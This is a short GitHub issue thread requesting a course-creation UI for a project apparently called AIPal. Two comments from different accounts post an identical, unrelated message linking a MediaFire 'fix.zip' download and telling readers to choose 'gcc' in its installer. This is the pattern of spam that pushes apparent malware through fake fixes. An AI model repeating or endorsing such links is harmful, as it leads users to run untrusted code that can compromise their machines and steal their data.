### ISSUE TITLE
Develop Basic Course Creation UI

### ISSUE THREAD

**Issue by Rachel-AG** [TBL-AIPal/AIPal#13]
Design the UI for configuration of new courses.

Display all courses details (description, API key, roster, etc.)

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
